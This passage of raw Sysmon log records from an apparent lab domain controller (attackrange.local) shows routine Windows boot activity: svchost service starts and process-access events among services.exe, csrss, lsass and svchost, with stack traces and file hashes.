13:53:05.071{10ACEC4A-853E-5FCF-0A00-000000009101}8521140C:\Windows\system32\services.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000854Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.071{10ACEC4A-853E-5FCF-0A00-000000009101}8521132C:\Windows\system32\services.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000853Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.071{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000852Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.083{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k LocalServiceC:\Windows\system32\NT AUTHORITY\LOCAL SERVICE{10ACEC4A-8541-5FCF-E503-000000000000}0x3e50SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000851Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.071{10ACEC4A-853E-5FCF-0A00-000000009101}8521192C:\Windows\system32\services.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000850Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.071{10ACEC4A-853E-5FCF-0A00-000000009101}8521192C:\Windows\system32\services.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000849Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.071{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000848Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.071{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000847Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.055{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000846Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.055{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000845Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.055{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000844Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.055{10ACEC4A-853E-5FCF-0A00-000000009101}852936C:\Windows\system32\services.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000843Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.055{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000842Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.055{10ACEC4A-853E-5FCF-0A00-000000009101}852940C:\Windows\system32\services.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000841Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.055{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000840Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.066{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k termsvcsC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{10ACEC4A-8540-5FCF-E403-000000000000}0x3e40SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000839Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.055{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000838Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.055{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000837Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.055{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000836Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.055{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000835Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.055{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000834Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.055{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000833Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.055{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000832Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.055{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000831Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.055{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000830Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 